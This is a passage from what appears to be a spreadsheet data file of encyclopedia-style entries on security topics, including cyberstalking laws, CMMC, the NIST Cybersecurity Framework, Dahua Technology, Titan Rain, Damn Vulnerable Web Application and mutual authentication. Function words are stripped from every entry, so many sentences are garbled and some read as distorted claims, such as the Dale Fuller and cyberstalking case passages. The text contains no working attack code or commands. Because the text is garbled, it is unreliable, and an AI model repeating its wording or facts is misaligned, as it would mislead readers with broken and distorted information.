wyoming, california, incorporated electronically communicated statements conduct constituting stalking anti-stalking laws. texas enacted stalking electronic communications act, 2001. missouri revised state harassment statutes include stalking harassment telephone electronic communications well cyber-bullying) megan meier suicide case 2006. cases cyberstalking conviction obtained cyberstalker woman, also much rarer male cyberstalkers. conviction overturned appeal 2009 however. florida, introduced 2003 cyberstalking. this signed october 2003. age, legal limitations while laws address online harassment children, laws protect adult cyberstalking victims. while sites specialize laws protect victims under, current pending cyberstalking-related united states federal state laws offer help victims ages.most stalking laws require perpetrator make credible threat violence victim; others include threats victim's immediate family; still others require alleged stalker's course conduct constitute implied threat. while conduct involving annoying menacing behavior might fall short illegal stalking, behavior prelude stalking violence treated seriously.online identity stealth blurs line infringement rights would-be victims identify perpetrators. there debate internet traced without infringing protected civil liberties. specific cases there number high-profile legal cases united states related cyberstalking, many involved suicides young students. thousands cases, charges either brought cyber harassment unsuccessful obtaining convictions. legal instances, much depends public sympathy towards victim, quality legal representation factors greatly influence outcome crime even considered crime.in case fourteen-year-old student michigan, instance, pressed charges alleged rapist, resulted cyberstalked cyberbullied fellow students. after suicide 2010 charges dropped allegedly raped her, basis witness dead. this despite fact statutory rape charges could pressed.in another case cyberstalking, college student dharun ravi secretly filmed roommate's sexual liaison another man, posted online. after victim committed suicide, ravi convicted bias intimidation invasion privacy jersey dharun ravi. 2012 sentenced days jail, $11,000 restitution three years probation. judge ruled believes ravi acted "colossal insensitivity, hatred." europe poland stalking, including cyberstalking, made criminal offence polish criminal code june 2011. spain spain, possible provide information cyber-crime anonymous four safety bodies: grupo delitos telemáticos civil guard (spain) spanish), brigada investigación tecnológica national police corps spain spanish), mossos d'esquadra catalonia, ertzaintza euskadi. also possible provide information non-governmental organization. united kingdom united kingdom, protection harassment 1997 contains offence stalking covering cyber-stalking, introduced protection freedoms 2012. also references further reading bocij, paul (2004). cyberstalking: harassment internet protect your family. greenwood publishing group. isbn 0-275-98118-5 ellison, louise; akdeniz, yaman. "cyber-stalking: regulation harassment internet" criminal review. december 1998 special edition: crime, criminal justice internet. 29–48. meloy, (2000). psychology stalking. reid. academic press. isbn 0-12-490561-7 mullen, paul pathé, michele; purcell, rosemary (2000). stalkers their victims. cambridge university press. isbn 0-521-66950-2 hitchcock, j.a. (2006). crimes misdemeanors: outmaneuvering spammers, swindlers, stalkers targeting online. cyberage books. isbn 0-910965-72-2 "pdf article cyberstalking united kingdom" (pdf). archived original (pdf) march 2007. retrieved august 2006. "crime library: cyberstalking". archived original february 2019. retrieved january 2017. cyberstalking covered current anti-stalking laws? craig patrick lynch external links privacy rights clearinghouseacademic government studiesunited states internet: georgia state university college (2001) "cybertelecom cyberstalking federal internet regulation". archived original november 2010. retrieved december 2013. stalking laws implementation practices: national review policymakers practitioners (full report) wayback machine (archive index), minnesota center against violence abuse (2002) "cyberstalking: challenge enforcement industry. report attorney general vice president". archived original march 2010. retrieved november 2013. united states department justice (august 1999). cyber stalking: analysis online harassment intimidation cyber crime journalblogs, storiessurviving extinct marsuplial: [sic] ongoing blog several victims single stalker documenting activities cautionary tale online romance revenge, (2013)</t>
  </si>
  <si>
    <t>Cyberstrategy 3.0</t>
  </si>
  <si>
    <t>cyberstrategy united states information warfare strategy cyberwarfare. this strategy uses deterrence based making infrastructure robust redundant enough survive internet cyber attack. good example concept seen action cyber strategy game like cyberstratg. references</t>
  </si>
  <si>
    <t>Cybersecurity Maturity Model Certification</t>
  </si>
  <si>
    <t>cybersecurity maturity model certification (cmmc) assessment framework assessor certification program designed increase trust measures compliance variety standards published national institute standards technologythe cmmc framework model developed office under secretary defense acquisition sustainment (ousd(a&amp;s)) united states department defense existing contracts carnegie mellon university, johns hopkins university applied, physics laboratory llc, futures, inc. cybersecurity maturity model certification accreditation body oversees program cost contract. cmmc, often requires third party assessment contractor handles controlled unclassified information, impact $768bn defense industry 3.2% gross domestic product united states america. model framework provides model contractors defense industrial base meet security requirements nist 800-171 protecting controlled unclassified information nonfederal systems organizations. some contracts also include subset requirements nist 800–172, enhanced security requirements protecting controlled unclassified information: supplement nist special publication. 800–171.cmmc organizes practices domains, directly nist 800-171 nist 800-172 families. there three levels within cmmc—level level level cmmc enforced federal contracts final rulemaking completed incorporated code federal regulations (cfr). [1].upcoming guidance promised cmmc office help expectations companies defense industrial base level accreditation sought, depending role prime various contracts. additional information found official faq. history 2002 federal information security management required federal agency united states develop, document, implement agency-wide program provide information security information information systems. 2002 cybersecurity research development authorized appropriations national science foundation (nsf) secretary commerce national institute standards technology (nist) establish programs, increase funding certain current programs, computer network security (cns) research development research fellowships. this development security requirements cybersecurity maturity model certification framework. 2003 fisma project, risk management project, launched published requirements fips 199, fips 200, nist special publications 800–53, 800–59, 800–6.then nist special publications 800–37, 800–39, 800–171, 800-53a. 2010 executive order 13556 controlled unclassified information rescinded previous order created standard labeling data across government. 2011 defense federal acquisition regulation supplemental (dfars) proposed rule 7000 enact requirements safeguarding unclassified information specifically related fundamental research proposed case 2011-d039. 2013 dfars 252.204-7000 rule goes effect required protection sensitive data non-federal systems. 2016 dfars 7012 clause goes effect requiring contract holders self assess meeting security requirements nist-sp-800-171. 2019 department defense announced creation cybersecurity maturity model certification (cmmc) transition mechanism self-attestation organization's basic cyber hygiene used govern defense industrial base. since 2017 defense contractors required self-assess report cybersecurity readiness nist sp-800-171 standard. after series breaches supply chain, department defense working partnership industry created cmmc model. 2019 interim rule authorizing inclusion cmmc procurement contracts, defense federal acquisition regulation supplement (dfars) 2019-d041, published september 2020, effective date november 2020.on december 2020, cmmc accreditation board department defense released updated timeline model fully implemented september 2021. december 2020, department defense releases seven pathfinder grants pilot cmmc framework require contractor grant certified third party assessor measure companies complianceon december 2020, general services administration released request proposal polaris program noted cmmc currently applies department defense government contractors, civilian military, prepare meet cmmc requirements.on november 2021, department defense announced release cmmc 2.0. this version designed streamline requirements. criticism industry professionals voiced significant concern lack centralized official communications accelerated timeline rollout. sheer number companies affected defense industrial base create level volume still-not-yet accredited cmmc third party assessment organizations (c3paos) would appear unrealistic proposed deadlines discussed heavily linkedin. arrington responded asserting reciprocity existing certification programs fedramp fips remove duplicative work keep work level minimal companies already compliance.there allegations cronyism appointment schieber chairman cmmc accreditation body schieber katie arrington worked together previously. schieber subsequently left board, along mark berman, communications director, amidst apparently unsanctioned 'pay play' sponsorship program published cmmc-ab website. karlton johnson stepped chair role. also defense industrial base (dib) fips fips 140-2 fips 140-3 fedramp common criteria level assessment guide level assessment guide references external links official cmmc website</t>
  </si>
  <si>
    <t>NIST RBAC model</t>
  </si>
  <si>
    <t>nist rbac model standardized definition role-based access control. although originally developed national institute standards technology, standard adopted copyrighted distributed incits 359-2004 international committee information technology standards (incits). latest version incits 359-2012. managed incits committee cs1. history 2000, nist called unified standard rbac, integrating rbac model published 1992 ferraiolo kuhn rbac framework introduced sandhu, coyne, feinstein, youman (1996). this proposal published sandhu, ferraiolo, kuhn presented workshop role based access control. following debate comment within rbac security communities, nist made revisions proposed u.s. national standard rbac incits. 2004, standard received ballot approval adopted incits 359-2004. sandhu, ferraiolo, kuhn later published explanation design choices model. 2010, nist announced revision rbac, incorporating features attribute-based access control (abac). also role-based access control references external links nist rbac site incits site</t>
  </si>
  <si>
    <t>NIST Cybersecurity Framework</t>
  </si>
  <si>
    <t>nist cybersecurity framework guidelines mitigating organizational cybersecurity risks, published national institute standards technology (nist) based existing standards, guidelines, practices. framework "provides high level taxonomy cybersecurity outcomes methodology assess manage outcomes", addition guidance protection privacy civil liberties cybersecurity context. translated many languages, used several governments wide range businesses organizations.a 2016 study found organizations surveyed nist cybersecurity framework popular best practice computer security, many note requires significant investment. overview nist cybersecurity framework designed individual businesses organizations assess risks face. version published national institute standards technology 2014, originally aimed operators critical infrastructure. 2017, draft version framework, version 1.1, circulated public comment. version announced made publicly available april 2018. version still compatible version 1.0. changes include guidance perform self-assessments, additional detail supply chain risk management, guidance interact supply chain stakeholders, encourages vulnerability disclosure process. framework divided three parts, "core", "profile" "tiers". "framework core" contains array activities, outcomes references aspects approaches cybersecurity. "framework implementation tiers" used organization clarify partners views cybersecurity risk degree sophistication management approach. "framework profile" list outcomes organization chosen categories subcategories, based needs risk assessments. organization typically starts using framework develop "current profile" describes cybersecurity activities outcomes achieving. develop "target profile", adopt baseline profile tailored sector (e.g. infrastructure industry) type organization. define steps switching current profile target profile. functions categories cybersecurity activities nist cybersecurity framework organizes "core" material five "functions" subdivided total "categories". category, defines number subcategories cybersecurity outcomes security controls, subcategories all. subcategory, also provides "informative resources" referencing specific sections variety information security standards, including 27001, cobit, nist 800-53, ansi/isa-62443, council cybersecurity critical security controls (ccs csc, managed center internet security). special publications (sp) aside, informative references requires paid membership purchase access respective guides. cost complexity framework resulted bills houses congress direct nist create cybersecurity framework guides accessible small medium businesses.here functions categories, along unique identifiers definitions, stated framework document. identify "develop organizational understanding manage cybersecurity risk systems, assets, data, capabilities." asset management (id.am): data, personnel, devices, systems, facilities enable organization achieve business purposes identified managed consistent relative importance business objectives organization's risk strategy. business environment (id.be): organization's mission, objectives, stakeholders, activities understood prioritized; information used inform cybersecurity roles, responsibilities, risk management decisions. governance (id.gv): policies, procedures, processes manage monitor organization's regulatory, legal, risk, environmental, operational requirements understood inform management cybersecurity risk. risk assessment (id.ra): organization understands cybersecurity risk organizational operations (including mission, functions, image, reputation), organizational assets, individuals. risk management strategy (id.rm): organization's priorities, constraints, risk tolerances, assumptions established used support operational risk decisions. supply chain risk management (id.sc): organization's priorities, constraints, risk tolerances, assumptions established used support risk decisions associated managing supply chain risk. organization place processes identify, assess manage supply chain risks. protect "develop implement appropriate safeguards ensure delivery critical infrastructure services." access control (pr.ac): access assets associated facilities limited authorized users, processes, devices, authorized activities transactions. awareness training (pr.at): organization's personnel partners provided cybersecurity awareness education adequately trained perform information security-related duties responsibilities consistent related policies, procedures, agreements. data security (pr.ds): information records (data) managed consistent organization's risk strategy protect confidentiality, integrity, availability information. information protection processes procedures (pr.ip): security policies (that address purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities), processes, procedures maintained used manage protection information systems assets. maintenance (pr.ma): maintenance repairs industrial control information system components performed consistent policies procedures. protective technology (pr.pt): technical security solutions managed ensure security resilience systems assets, consistent related policies, procedures, agreements. detect "develop implement appropriate activities identify occurrence cybersecurity event." anomalies events (de.ae): anomalous activity detected timely manner potential impact events understood. security continuous monitoring (de.cm): information system assets monitored discrete intervals identify cybersecurity events verify effectiveness protective measures. detection processes (de.dp): detection processes procedures maintained tested ensure timely adequate awareness anomalous events. respond "develop implement appropriate activities take action regarding detected cybersecurity incident." response planning (rs.rp): response processes procedures executed maintained, ensure timely response detected cybersecurity events. communications (rs.co): response activities coordinated internal external stakeholders, appropriate, include external support enforcement agencies. analysis (rs.an): analysis conducted ensure adequate response support recovery activities. mitigation (rs.mi): activities performed prevent expansion event, mitigate effects, eradicate incident. improvements (rs.im): organizational response activities improved incorporating lessons learned current previous detection/response activities. recover "develop implement appropriate activities maintain plans resilience restore capabilities services impaired cybersecurity incident." recovery planning (rc.rp): recovery processes procedures executed maintained ensure timely restoration systems assets affected cybersecurity events. improvements (rc.im): recovery planning processes improved incorporating lessons learned future activities. communications (rc.co): restoration activities coordinated internal external parties, coordinating centers, internet service providers, owners attacking systems, victims, csirts, vendors. online informative references addition informative references framework's core, nist also maintains online database informative references. informative references show relationships framework functions, categories, subcategories specific sections standards, guidelines, best practices common among framework stakeholders. informative references illustrate ways achieve framework outcomes. informative references home derived relationship mapping informative reference catalog updates 2021 nist released security measures “eo-critical software” under executive order (eo) 14028 outline security measures intended better protect deployed eo-critical software agencies’ operational environments. also cyber security standards nist privacy framework critical infrastructure protection iso/iec 27001:2013: information security standard international organization standardization cobit: control objectives information related technologies related framework isaca nist special publication 800-53: “security privacy controls federal information systems organizations." nistir 8374 (draft): cybersecurity framework profile ransomware risk management (preliminary draft) references this article incorporates public domain material national institute standards technology document: "nist cybersecurity framework" (pdf). external links official website (and use) nist cybersecurity framework frsecure information security management harnessing power nist cybersecurity framework minute guide nist cybersecurity framework</t>
  </si>
  <si>
    <t>DHMakerBus</t>
  </si>
  <si>
    <t>makerbus, also known dhmakerbus, mobile makerspace technology education classroom london, ontario. makerbus claims first kind canada. history makerbus founded 2013 beth compton, martin, ryan hunt. created purposes. first, intended used take attendees digital humanities 2013 conference southern ontario michigan conference lincoln, nebraska. second, makerbus created help provide greater access technology, making, education london/middlesex region. raise money project, called "dhmakerbus," indiegogo crowd-funding campaign launched april 2013 funding goal $10,000. two-month funding window, dhmakerbus received $2,856 community funding. with funding makerbus team purchased used school bus. activities makerbus team seeks promote access technology education london/middlesex region. first year operation makerbus worked community partners create pop-up educational events promoted non-traditional uses technology. makerbus worked number educational partners london, like literacy link south central, london public libraries, western fair. projects date largest project undertaken makerbus make london wearable technology made clothing fashion show. this event held partnership museum london homemade clothing designers around southern ontario come together create fashion show celebrated fashion technology. other projects include ongoing partnership literacy link south central part ontario literacy network) create classes focus improving adult digital literacy skills. past examples classes include using quadcopters teaching tool math skills using makeymakey build confidence adult learners. makerbus team held community events london raise awareness maker movement like make london making brought together local makers members general public. partners makerbus works variety partners london, partners include: literacy link south central london public libraries thames valley district school board bread roses books ontario library association references</t>
  </si>
  <si>
    <t>TitanFile</t>
  </si>
  <si>
    <t>titanfile inc. canadian company headquartered toronto, ontario. titanfile provides secure professionals communicate share files clients. company secure cloud computing pioneers advocating stronger privacy policies canada well united states. history 2010, company nova scotia co-operative's best idea 2010 competition cloudcamp's cloudy awards 2011. march 2011, co-founders milan vrekic tony abou-assaleh launched titanfile publicly. that month, chronicle herald mentioned titanfile's support organizations individuals securely share documents.in august 2011, titanfile secured $250,000 seed financing round innovacorp, december 2011, titanfile announced first expansion plans kitchener, ontario. company recognized canada's coming list branham300 awarded runner-up backbone magazine's alpha exchange innovation campaign pitch-off toronto.on october 2012, company revealed relaunching original titanfile design accommodate collaborative environment users. that announced $1.1 million financing round investors innovacorp, first angel network (fan), handful private investors.on october 2013, titanfile released suite enterprise features cater needs modern professional teams. december 2013, company part hours valley" program held francisco. company finished year partnering hitachi solutions america create secure system enhanced user controls mobile capabilities. product titanfile originally designed robust reliable one-way file transfer solution users wishing send receive electronic documents confidential email. company focused accommodate secure client correspondence 2012. today, titanfile mobile application combines file management sharing, instant messaging, security. references</t>
  </si>
  <si>
    <t>DVB-CPCM</t>
  </si>
  <si>
    <t>content protection copy management often abbreviated dvb-cpcm cpcm digital rights management standard developed project. main application interoperable rights management european digital television, though countries also adopt standard. works cpcm specifies adding information digital content, television programs, describe content used shared among cpcm-enabled devices. content providers range flags stored content describe used. cpcm-enabled devices obey flags. these flags allow deny content either moved copied cpcm devices. content also provided time limit, forbid content played concurrently separate devices. domains cpcm distinguish devices inside outside "authorized domain" devices. authorized domain include devices home remote locations cars vacation homes. also specifies whether content remain inside home (the "local environment") inside physical region, country (the "geographic area"). robustness requirement cpcm content protection mechanisms used contains "robustness requirement" demands manufacturers design technologies resist end-user modification, makes impossible implement fully trusted cpcm user-modifiable software like linux. unlike systems, cpcm theory) supports choice robustness regimes rather tying everyone single conditions. possible different regimes emerge e.g. distinct trust models free even public domain type content. each could appropriate levels robustness requirement. would even possible define cpcm regime permits implementation user-modifiable software, though would probably trusted receive content commercial services. time regime announced, restrictions identified related technology broadcast flag cpcm sometimes compared failed u.s. broadcast flag: defined signals within service information (dvb-si) allow free-to-air broadcaster signal correct behaviour content protection systems cpcm. these signals specific cpcm, also used control hdcp similar systems. however, cpcm defined exact mapping signals cpcm usage state information. https://web.archive.org/web/20060927002425/http://www.dvb.org/technology/dvb-cpcm/ information. worth noting europe single regulating authority like fcc, exact parallel enforcement rules failed approach unlikely. hdcp dtcp-ip hdcp protects single wire connection, typically hdmi. cpcm network independent used lan, wifi, theory even ieee 1394 firewire links. dtcp-ip link protection system similar hdcp, operates wlan connection. both hdcp dtcp-ip link protection "render toss" technologies generally prohibit receiving device recording redistributing content. also, designed prevent connection devices close proximity another. cpcm contrast allow recording and/or remote access depending specific rights granted content. publication full technical specification dvb-cpcm published project freely downloaded location. normative sections approved publication steering board, published etsi formal european standard etsi 825-x refers part number specification. nobody stepped forward provide compliance robustness regime standard (though several rumoured development), presently possible fully implement system, nowhere obtain necessary device certificates. also external links current standard (official sites) project cpcm specifications electronic frontier foundation cpcm stealth attack europeans' digital rights controls your television? fastcom technology fastcom technology showed 50th dvb-cpt meeting (7–9 february 2007) first demonstrator dvb-cpcm standard developing</t>
  </si>
  <si>
    <t>Dahua Technology</t>
  </si>
  <si>
    <t>zhejiang dahua technology co., ltd. partially state-owned publicly traded company based binjiang district, hangzhou, sells video surveillance products services. founded controlled liquan (傅利泉). history 2018, dahua acquired security video camera company lorex.in november 2020, dahua us$9 million, 1,900-camera smart city project public security bureau jiexiu.in april 2021, motorola solutions announced indigovision, motorola solutions-owned company, would longer relabel dahua cameras, citing u.s. ndaa supply-chain concerns.in 2021 best buy, home depot, lowe's stopped selling cameras dahua brand lorex concerns dahua's complicity surveillance human rights violations xinjiang.in november 2021, dahua named secure equipment several entities prohibited receiving u.s. telecommunication equipment licenses national security reasons. market dahua technology listed shenzhen stock exchange since 2008. company component multiple indices, including szse component index, szse composite index, szse index. partnerships 2016, dahua partnered dell build smart security systems. 2017, dahua partnered beijing university posts telecommunications (bupt) build joint intelligent video laboratory. beginning late 2019, dahua began partner vatican museum, providing security full implementation five years. shareholders dahua technology majority owned fully controlled liquan wife chen ailing. december 2020, owned 34.18% shares largest shareholder, chen owned 2.38%.according 2020 annual financial report, dahua technology also partially state-owned central huijin asset management china galaxy securities co., ltd. 1.05% 1.82 respectively. central huijin investment state-owned enterprise wholly owned subsidiary china investment corporation, sovereign wealth fund reports state council people's republic china.china mobile acquired 10.42% stake dahua march 2021. controversies cybersecurity vulnerabilities september 2016, largest ddos attack date, krebsonsecurity.com, traced back botnet. according internet provider level communications, commonly infected devices botnet dahua dahua cameras dvrs. nearly million dahua devices infected bashlite malware. vulnerability dahua's cameras allowed "anyone take full control devices' underlying linux operating system typing random username many characters." this exploited, malware installed devices allowed used "both ddos attacks well extortion campaigns using ransomware."in march 2017 backdoor many dahua cameras dvrs discovered security researchers working fortune company. vulnerability activated cameras within fortune company's network, data trafficked china company's firewall. using browser, vulnerability allowed unauthorised people remotely download device's database usernames passwords subsequently gain access dahua issued firmware update vulnerability products. security researchers discovered updated firmware contained vulnerability vulnerability relocated different part code. this characterized security researchers deliberate deception.in march 2021, federal communications commission declared dahua services equipment "pose unacceptable risk u.s. national security.” response, intercept said, “the u.s. government provided public evidence dahua hikvision spying customers.”in september 2021, dahua acknowledged identity authentication bypass vulnerability affecting device models that, exploited, allow attackers "bypass device identity authentication constructing malicious data packets." october 2021, techcrunch reported home depot best stopped selling lorex-branded dahua ezviz products. mass surveillance ethnic minorities dahua played role mass surveillance uyghurs xinjiang. october 2019, u.s. government placed dahua bureau industry security's entity list role surveillance uyghurs xinjiang ethnic religious minorities china. november 2020, security researchers identified facial identification software code designations ethnicity, dahua removed code question github. february 2021, angeles times published investigation dahua's technology purpose uyghur surveillance. security industry association expulsion security industry association, u.s.-based trade organization representing electronic physical security solutions providers united states, terminated dahua technology's membership june 2021, citing unnamed violations code ethics. also hikvision references external links official website chinese) international official website english)</t>
  </si>
  <si>
    <t>Titan Security Key</t>
  </si>
  <si>
    <t>titan security fido-compliant security token developed google contains titan cryptoprocessor also developed google. first released october 2019.depending features, costs $25-$35, google provided free high-risk users. considered secure form multi-factor authentication first-party third-party services enroll google's advanced protection program. 2021, google removed bluetooth model concerns security reliability. vulnerabilities bluetooth models initially security allowed anyone within feet make clone key. security firm ninjalab able extract using side channel attack. 2019, google bounty us$1.5 million titan chip. references</t>
  </si>
  <si>
    <t>Dale Fuller</t>
  </si>
  <si>
    <t>dale fuller silicon valley’s first-generation software executives, entrepreneurs developers. took whowhere? inc. public, apple’s powerbook division profitability served chief executive officer president borland software corporation. fuller chairman served president chief executive officer mokafive inc. career during early career, fuller worked canon, motorola, texas instruments technologies inc. from 1987 1991, worked business development group apple.from 1994 1996, fuller vice president general manager portable computer systems nec, moving nec's notebook computers tier portable systems manufacturers. during time there, extended company’s leadership marketplace development deployment.in 1996, fuller returned apple vice president general manager company’s powerbook division. restructured returned troubled powerbook division profitability.in 1997 fuller helped grow whowhere.com, angelfire.com, mailcity, purchased lycos 1998. 1999, fuller served interim president borland software corporation, also known inprise. position became permanent 2000. fuller fired borland 2005 following weak quarterly performance. mcafee inc. named fuller interim president january 2006. fuller took george samenuk kevin weiss following internal probe options backdating practices company’s initial public offering 1996 2003. fuller held position july 2007.in 2008, fuller became mokafive’s president ceo.in 2018, fuller joined board directors comscore [scor] symantec [symc]. credentials bachelor science, computer science, pacific college 1980 executive certificate business administration, stanford university, advance management college 1994 honorary doctorate, petersburg state university, russia chairman, them hear foundation member, advisory board essential solutions inc. advisory board seecontrol inc. american association artificial intelligence institute electrical electronics engineers mentor, bootup labs, inc.former directorshipspacific edge software inc. medrium inc. mailfrontier inc. guidance software inc. krugle inc. phoenix technologies ltd. borland software corporation software industry information association mcafee inc., seecontrol inc. webgistix inc. zoran corporation moka5 quantum corporation technologies soothe, inccurrent directorshipsprosites, mobisocial comscore symantec references</t>
  </si>
  <si>
    <t>Reverse Deception</t>
  </si>
  <si>
    <t>reverse deception: organized cyber threat counter-exploitation investigates methods criteria address organizational responses advanced persistent threats. cyber deception. details identity apts prioritize actions applying skilled field-tested private- government- sector processes methods often involves cyber deception. content book reviews historical significant malware: titan rain, moonlight maze, stakkato stuxnet reviewed light criteria. exploitation's stuxnet major cyber events reviewed operational aspect. these exploits complex expensive approaches even less discussed concept development resource intensive, often believed sponsored government essence conducting offensive action. countries crime others consider aggressive defensive technique. work contains four stories regarding deception counter deception. these explained fictionalized works actual events occurred somewhere enforcement intelligence world, vetting clear works rooted domestic international work. cases varied considered compelling noted cyber critics reviewers work. authors introduce first theory classifying threat opportunistic-apt continuum either persistent non-persistent. classifications criteria widely used industry built evaluation following criteria:apt criteria objectives timeliness resources risk tolerance adversary) skills methods actions attack origination points numbers involved attack knowledge sourcethreat intelligence analysis cyber espionage tactics contrasted types permissible countermeasures deception disinformation campaigns case studies real stories authors’ fbi, dod, nsa, private sector work. value chain management counter espionage espionage legal interpretations capacities, limitations, stipulations assisting enforcement investigations. authors sean bodmer, cissp, ceh, founder chief technologist pragmatik grouip, kilger, ph.d., specialist profiling behavioral analysis black community hackers. founding member honeynet project, currently board directors, serves chief membership officer chief profiler. gregory carpenter, drph, cism, adjunct professor northern virginia international board advisors mackenzie institute, advisory board ec-council university board directors atna systems. jade jones, juris doctor experience including information operations space law. civilian department defense navy commander u.s. naval reserves. also advanced persistent threat asymmetric dominance byzantine foothold carl clausewitz computer network defense computer network operations cyberwarfare deception honeypot information warfare moonlight maze operation aurora simulated reality solar sunrise stakkato stuxnet titan rain references external links about authors reverse deception radio</t>
  </si>
  <si>
    <t>Titan Rain</t>
  </si>
  <si>
    <t>titan rain series coordinated attacks computer systems united states since 2003; known ongoing least three years. attacks originated guangdong, china. activity believed associated state-sponsored advanced persistent threat. given designation titan rain federal government united states. titan rain hackers gained access many united states defense contractor computer networks, targeted sensitive information, including lockheed martin, sandia national laboratories, redstone arsenal, nasa. attackers attacks reported result actions people's liberation army unit 61398. these hackers attacked government (defense intelligence agency) government (ministry defence). 2006, "organised chinese hacking group" shut part house commons computer system. chinese government denied responsibility. consequences u.s. government blamed chinese government 2004 attacks. alan paller, sans institute research director, stated attacks came individuals "intense discipline" organization could military". such sophistication pointed toward people's liberation army attackers.titan rain reportedly attacked multiple organizations, nasa fbi. although classified information reported stolen, hackers able steal unclassified information (e.g., information home computer) could reveal strengths weaknesses united states. titan rain also caused distrust countries (such united kingdom russia) china. united kingdom stated officially chinese hackers attacked governmental offices. titan rain caused rest world cautious attacks china countries well. also cyberwarfare china apollo moonlight maze operation aurora shawn carpenter stakkato references</t>
  </si>
  <si>
    <t>NAFFCO</t>
  </si>
  <si>
    <t>naffco (national fire fighting manufacturing fzco) middle east-based manufacturer firefighting products, business built around fire protection engineering. headquarters dubai, united arab emirates (uae), jebel free zone, conducts manufacturing uae. naffco composed major business segments: security services fire protection. history naffco founded 1991 khalid khatib. started working small fire fighting equipment manufacturing factory jebel ali, uae. awards recognition naffco received mohammed rashid maktoum business award excellence exports 2005 excellence manufacturing 2006, 2010 2013. 2017, naffco received cycle mohammed rashid maktoum business award. references further reading interview executive directors company: khalid khatib, ahmed; khalid khatib, december 2016). "innovation drives successes". khaleej times (interview). interviewed ishtiaq mehkri. united arab emirates. retrieved 2019. "naffco leads fire safety sector gulf industry fair". arab news. jeddah, saudi arabia: saudi research publishing company. january 2017. retrieved 2019.</t>
  </si>
  <si>
    <t>Damn Vulnerable Web Application</t>
  </si>
  <si>
    <t>damn vulnerable application software project intentionally includes security vulnerabilities intended educational purposes. examples cross site scripting injection references external links official website</t>
  </si>
  <si>
    <t>MyGreenElectronics</t>
  </si>
  <si>
    <t>mygreenelectronics public service online portal consumers recycle reuse electronics products reached end-of-life. designed consumer electronics association empower consumers make people consider "responsible choices" throughout products’ life cycle (purchasing, use, reuse, recycling), specifically endorse company business practice, meant objective resource. uses there main ways consumers site allows consumers identify "green products". green product database includes various items baby monitors, cell phones, plasma eco-friendly accessories. gives consumers opportunity find electronics recycler area using zip-code search. additional components aside immediate functional uses, site educates public "reduce" energy usage "rethink" consume electronics products. order "reduce" amount electricity consumer's products consume, advises consumers look energy star logo products buy. comprehensive list advice recommendations available "reduce" section site. thus, encourages consumers "rethink" ways make smarter, environmentally friendlier choices purchasing electronics products. varying perspectives electronics recycling there entities united states abroad raise serious concerns electronics recycling. some groups concerned workers actual recycling exposed toxins harmful health. mygreenelectronics represents consumer-driven voluntary approach recycling. some people believe government compel consumers advance future recycling cost product. others believe manufacturers electronics take full responsibility recycling disposal products. mygreenelectronics news going green with your computer march 2007 wcco.com news some consumers opting eco-friendly computers february 2007 news also electronic waste external links similar homepage different name references</t>
  </si>
  <si>
    <t>Mutual authentication</t>
  </si>
  <si>
    <t>mutual authentication two-way authentication (not confused two-factor authentication) refers parties authenticating time authentication protocol. default mode authentication protocols (ike, ssh) optional others (tls). mutual authentication desired characteristic verification schemes transmit sensitive data, order ensure data security. mutual authentication accomplished types credentials: usernames passwords, public certificates. mutual authentication often employed internet things (iot). writing effective security schemes systems become challenging, especially schemes desired lightweight computational costs. mutual authentication crucial security step defend many adversarial attacks, otherwise large consequences systems (such e-healthcare servers) hacked. scheme analyses done past works, lack mutual authentication considered weakness data transmission schemes. process steps verification schemes mutual authentication step different methods encryption, communication, verification, share thing common: entity involved communication verified. alice wants communicate bob, authenticate verify expecting communicate data messages transmitted. mutual authentication process exchanges user implemented follows: alice sends encrypted message show alice valid user. verifies message: checks format timestamp. either incorrect invalid, session aborted. message decrypted bob's secret key, giving alice's checks message matches valid user. not, session aborted. sends alice message back show valid user. alice verifies message: alice checks format timestamp. either incorrect invalid, session aborted. then, message decrypted alice's secret key, giving bob's alice checks message matches valid user. not, session aborted. point, parties verified claim safe communicate with. lastly, alice create shared secret continue communicating secure manner.to verify mutual authentication occurred successfully, burrows-abadi-needham logic (ban logic) well regarded widely accepted method use, verifies message came trustworthy entity. logic first assumes entity trusted, verify legality. defenses mutual authentication supports zero trust networking protect communications adversarial attacks, notably: man-in-the-middle attack man-in-the-middle (mitm) attacks third party wishes eavesdrop intercept message, sometimes alter intended message recipient. parties openly receive messages without verifying sender, realize adversary inserted communication line. mutual authentication prevent mitm attacks sender recipient verify sending message keys, parties verified claim are, session end. replay attack replay attack similar mitm attack older messages replayed context fool server. however, work schemes using mutual authentication timestamps verification factor used protocols. change time greater maximum allowed time delay, session aborted. similarly, messages include randomly generated number keep track message sent. spoofing attack spoofing attacks rely using false data pose another user order gain access server identified someone else. mutual authentication prevent spoofing attacks server authenticate user well, verify correct session allowing communication access. impersonation attacks when party authenticates other, send certificate party knows unscramble, verifying trusted source. way, adversaries cannot impersonation attacks correct certificate party.mutual authentication also ensures information integrity parties verified correct source, information received reliable well. mtls default protocol proves identity server client using x.509 certificates, authentication client server left application layer. also offers client-to-server authentication using client-side x.509 authentication. requires provisioning certificates clients involves less user-friendly experience, rarely used end-user applications. mutual authentication (mtls) often used business-to-business (b2b) applications, limited number programmatic homogeneous clients connecting specific services, operational burden limited, security requirements usually much higher compared consumer environments. mtls also used microservices-based applications based runtimes dapr, systems like spiffe. lightweight schemes secured schemes while lightweight schemes secure schemes mutually exclusive, adding mutual authentication step data transmissions protocols often increase performance runtime computational costs. this become issue network systems cannot handle large amounts data constantly update real-time data (e.g. location tracking, real-time health data).thus, becomes desired characteristic many mutual authentication schemes lightweight properties (e.g. memory footprint) order accommodate system storing data. many systems implement cloud computing, allows quick access large amounts data, sometimes large amounts data slow communication. even edge-based cloud computing, faster general cloud computing closer proximity server user, lightweight schemes allow speed managing larger amounts data. solution keep schemes lightweight mutual authentication process limit number bits used communication.applications solely rely device-to-device (d2d) communication, multiple devices communicate locally close proximities, removes third party network. this turn speed communication time. however, authentication still occurs insecure channels, researchers believe still important ensure mutual authentication occurs order keep secure scheme.schemes sacrifice better runtime storage cost ensuring mutual authentication order prioritize protecting sensitive data. password-based schemes mutual authentication schemes require user's input password part verification process, higher vulnerability hackers password human-made rather computer-generated certificate. while applications could simply require users computer-generated password, inconvenient people remember. user-made passwords ability change one's password important making application user-friendly, many schemes work accommodate characteristic. researchers note password based protocol mutual authentication important user identities passwords still protected, messages readable parties involved.however, negative aspect password-based authentication password tables take memory space. around using memory password-based authentication scheme implement one-time passwords (otp), password sent user email. otps time-sensitive, means expire certain amount time memory need stored. multi-factor authentication recently, schemes higher level authentication password based schemes. while password-based authentication considered "single-factor authentication," schemes 